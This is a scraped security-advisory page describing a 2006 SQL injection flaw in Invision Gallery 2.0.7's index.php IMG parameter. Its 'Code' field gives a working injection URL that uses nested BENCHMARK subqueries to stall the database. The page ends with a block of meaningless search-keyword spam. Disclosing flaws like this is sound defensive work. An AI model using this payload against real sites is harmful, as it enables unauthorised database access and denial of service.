exploits , vulnerabilities , articles , Invision Gallery Index.PHP IMG Parameter SQL Injection Vulnerability

Title	Invision Gallery Index.PHP IMG Parameter SQL Injection Vulnerability
Published	2006-12-01-12:00AM
Updated	2006-12-04-06:44PM
Class	Input Validation Error
CVE
Remote	Yes
Local	No
Credit	infection@mail.kz is credited with the discovery of this vulnerability.
Vulnerable	Invision Power Services Invision Gallery 2.0.7
Not Vulnerable
Code	Attackers can exploit these issues via a web client. The following exploit is available: http://www.example.com/index.php?automodule=gallery&cmd=postcomment&op=doaddcomment&Post=test&img=111 OR id IN (SELECT BENCHMARK(10000000,BENCHMARK(10000000,md5(current_date))) FROM ipb_gallery_images )
TXT

Vulnerabilities - newest 10 RSS | More

2009-12-10 WebKit SVG Animation Elements User After Free Remote Code Execution Vulnerability
2009-12-10 Moodle Multiple Vulnerabilities
2009-12-10 Linux Kernel KVM Large SMP Instruction Local Denial of Service Vulnerability
2009-12-09 Adobe Flash Player and AIR Data Injection Remote Code Execution Vulnerability
2009-12-09 Adobe Flash Player ActiveX Control Information Disclosure Vulnerability
2009-12-09 Adobe Flash Player and AIR Multiple Unspecified Remote Code Execution Vulnerabilities
2009-12-09 HP OpenView Network Node Manager Multiple Remote Code Execution Vulnerabilities
2009-12-09 Shibboleth Redirection URL HTML Injection Vulnerability
2009-12-09 VLC Media Player RTSP Remote Buffer Overflow Vulnerability
2009-12-09 Polipo Malformed HTTP GET Request Memory Corruption Vulnerability

SECURITY RSS FEEDS

Advertising

Copyright 2007, SecurityDot
Thu, 10 Dec 2009 22:08:29 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
news for c sssss Www.Nangab exploit Mi index.php? MARUTISUZU vidoesex 200 /compo news searc news for c www.mianfe www.17kmm1 big+nudes wwwsxcom Www.trisha www.walito reda www.indian index.php? linux2.2.1 www.diaoyu free xxx v Www.Xnxx.C www.wangzh /component Tamilsexph /search/ex Tamill.sex www. sex.c Mama dan a girlssexfi Crack+Data vBulletin news for C news for c hpoto http:/wwwT indian se counterstr FOTOS PORN fsrs 200+%252Fc meal www.thewor rakhi sawa www.131411 tabu sex http:/www. sex.ca news for c